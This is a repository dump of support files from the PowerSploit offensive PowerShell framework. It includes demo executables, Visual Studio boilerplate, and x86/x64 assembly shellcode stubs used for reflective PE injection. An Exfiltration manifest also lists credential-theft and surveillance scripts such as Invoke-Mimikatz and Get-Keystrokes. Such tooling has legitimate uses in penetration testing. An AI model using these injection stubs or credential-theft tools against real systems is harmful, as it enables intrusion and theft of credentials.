{F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32 17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32 18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64 19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64 20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32 21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32 22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64 23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64 24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32 25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32 26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64 27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64 28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32 29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32 30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64 31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64 32 | EndGlobalSection 33 | GlobalSection(SolutionProperties) = preSolution 34 | HideSolutionNode = FALSE 35 | EndGlobalSection 36 | EndGlobal 37 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp: -------------------------------------------------------------------------------- 1 | // DemoExe.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | using namespace std; 8 | 9 | int _tmain(int argc, _TCHAR* argv[]) 10 | { 11 | printf("Exe loaded! Printing argc and argv\n\n"); 12 | 13 | printf("Argc: %d\n", argc); 14 | printf("ArgvAddress: %d\n", argv); 15 | 16 | for (int i = 0; i < argc; i++) 17 | { 18 | wprintf(L"Argv: %s\n", argv[i]); 19 | } 20 | 21 | printf("Exiting exe\n"); 22 | 23 | return 0; 24 | } 25 | 26 | 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : DemoExe_MD Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoExe_MD application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoExe_MD application. 9 | 10 | 11 | DemoExe_MD.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoExe_MD.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoExe_MD.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoExe_MD.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp: -------------------------------------------------------------------------------- 1 | // DemoExe.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | using namespace std; 8 | 9 | int _tmain(int argc, _TCHAR* argv[]) 10 | { 11 | printf("Exe loaded! Printing argc and argv\n\n"); 12 | 13 | printf("Argc: %d\n", argc); 14 | printf("ArgvAddress: %d\n", argv); 15 | 16 | for (int i = 0; i < argc; i++) 17 | { 18 | wprintf(L"Argv: %s\n", argv[i]); 19 | } 20 | 21 | printf("Exiting exe\n"); 22 | 23 | return 0; 24 | } 25 | 26 | 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoExe_MDd application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoExe_MDd application. 9 | 10 | 11 | DemoExe_MDd.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoExe_MDd.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoExe_MDd.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoExe_MDd.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32 14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32 15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp: -------------------------------------------------------------------------------- 1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | using namespace std; 8 | 9 | int _tmain(int argc, _TCHAR* argv[]) 10 | { 11 | printf("Press enter to close.\n"); 12 | getchar(); 13 | 14 | return 0; 15 | } 16 | 17 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this ExeToInjectInTo application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your ExeToInjectInTo application. 9 | 10 | 11 | ExeToInjectInTo.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | ExeToInjectInTo.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | ExeToInjectInTo.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // ExeToInjectInTo.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt: -------------------------------------------------------------------------------- 1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning. 2 | 3 | Compile: 4 | x64: 5 | nasm -f elf64 FileName.asm 6 | ld -o FileName FileName.o 7 | objdump -M intel -d FileName 8 | 9 | x86: 10 | nasm FileName.asm 11 | ld -o FileName FileName.o 12 | objdump -M intel -d FileName -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | global _start 3 | 4 | _start: 5 | ; Get stack setup 6 | push rbx 7 | mov rbx, rsp 8 | and sp, 0xff00 9 | 10 | ; Call DllMain 11 | mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell 12 | mov rdx, 0x1 ; PROCESS_ATTACH 13 | mov r8, 0x0 ; NULL 14 | mov rax, 0x4141414141414141 ; Address of DllMain, set by PS 15 | call rax 16 | 17 | ; Fix stack 18 | mov rsp, rbx 19 | pop rbx 20 | ret 21 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Set a var to 1, let PS known exe is exiting 7 | mov rbx, 0x4141414141414141 8 | mov [rbx], byte 0x01 9 | 10 | ; Call exitthread instead of exitprocess 11 | sub rsp, 0xc0 12 | and sp, 0xFFf0 ; Needed for stack alignment 13 | mov rbx, 0x4141414141414141 14 | call rbx 15 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Save state of rbx and stack 7 | push rbx 8 | mov rbx, rsp 9 | 10 | ; Set up stack for function call to GetProcAddress 11 | sub rsp, 0x20 12 | and sp, 0xffc0 13 | 14 | ; Call getprocaddress 15 | mov rcx, 0x4141414141414141 ; DllHandle, set by PS 16 | mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS 17 | mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS 18 | call rax 19 | 20 | ; Store the result 21 | mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS 22 | mov [rcx], rax 23 | 24 | ; Restore stack 25 | mov rsp, rbx 26 | pop rbx 27 | ret 28 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Save rsp and setup stack for function call 7 | push rbx 8 | mov rbx, rsp 9 | sub rsp, 0x20 10 | and sp, 0xffc0 11 | 12 | ; Call LoadLibraryA 13 | mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS 14 | mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS 15 | call rdx 16 | 17 | mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS 18 | mov [rdx], rax 19 | 20 | ; Fix stack 21 | mov rsp, rbx 22 | pop rbx 23 | ret 24 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | global _start 3 | 4 | _start: 5 | ; Get stack setup 6 | push ebx 7 | mov ebx, esp 8 | and esp, 0xfffffff0 9 | 10 | ; Call DllMain 11 | mov ecx, 0x41414141 ; DLLHandle, set by PowerShell 12 | mov edx, 0x1 ; PROCESS_ATTACH 13 | mov eax, 0x0 ; NULL 14 | push eax 15 | push edx 16 | push ecx 17 | mov eax, 0x41414141 ; Address of DllMain, set by PS 18 | call eax 19 | 20 | ; Fix stack 21 | mov esp, ebx 22 | pop ebx 23 | ret 24 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | global _start 3 | 4 | _start: 5 | ; Set a var to 1, let PS know the EXE is exiting 6 | mov ebx, 0x41414141 7 | mov [ebx], byte 0x01 8 | 9 | ; Call exitthread instead of exit process 10 | sub esp, 0x20 11 | and esp, 0xFFFFFFc0 ; Needed for stack alignment 12 | mov ebx, 0x41414141 13 | call ebx 14 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm: -------------------------------------------------------------------------------- 1 | [SECTION .text] 2 | 3 | global _start 4 | 5 | _start: 6 | ; Save state of ebx and stack 7 | push ebx 8 | mov ebx, esp 9 | 10 | ; Align stack 11 | and esp, 0xffffffc0 12 | 13 | ; Call GetProcAddress 14 | mov eax, 0x41414141 ; DllHandle, supplied by PS 15 | mov ecx, 0x41414141 ; Function name, supplied by PS 16 | push ecx 17 | push eax 18 | mov eax, 0x41414141 ; GetProcAddress address, supplied by PS 19 | call eax 20 | 21 | ; Write GetProcAddress return value to an address supplied by PS 22 | mov ecx, 0x41414141 ; Address supplied by PS 23 | mov [ecx], eax 24 | 25 | ; Fix stack 26 | mov esp, ebx 27 | pop ebx 28 | ret 29 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module CodeExecution` 7 | 8 | To see the commands imported, type `Get-Command -Module CodeExecution` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/Exfiltration.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Exfiltration.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Exfiltration Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Format files (.ps1xml) to be loaded when importing this module 25 | FormatsToProcess = 'Get-VaultCredential.ps1xml' 26 | 27 | # Functions to export from this module 28 | FunctionsToExport = '*' 29 | 30 | # List of all files packaged with this module 31 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1', 32 | 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1', 33 | 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1', 34 | 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml', 35 | 'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1' 36 | 37 | } 38 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/Exfiltration.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/Get-VaultCredential.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | VaultItemView 6 | 7 | VAULTCLI.VAULTITEM 8 | 9 | 10 | 11 | 12 | 13 | 14 | Vault 15 | 16 | 17 | Resource 18 | 19 | 20 | Identity 21 | 22 | 23 | Credential 24 | 25 | 26 | PackageSid 27 | 28 | 29 | LastModified 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32 16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64 17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64 18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32 19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32 20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64 21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : LogonUser Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this LogonUser application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your LogonUser application. 9 | 10 | 11 | LogonUser.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | LogonUser.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | LogonUser.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named LogonUser.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // LogonUser.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this 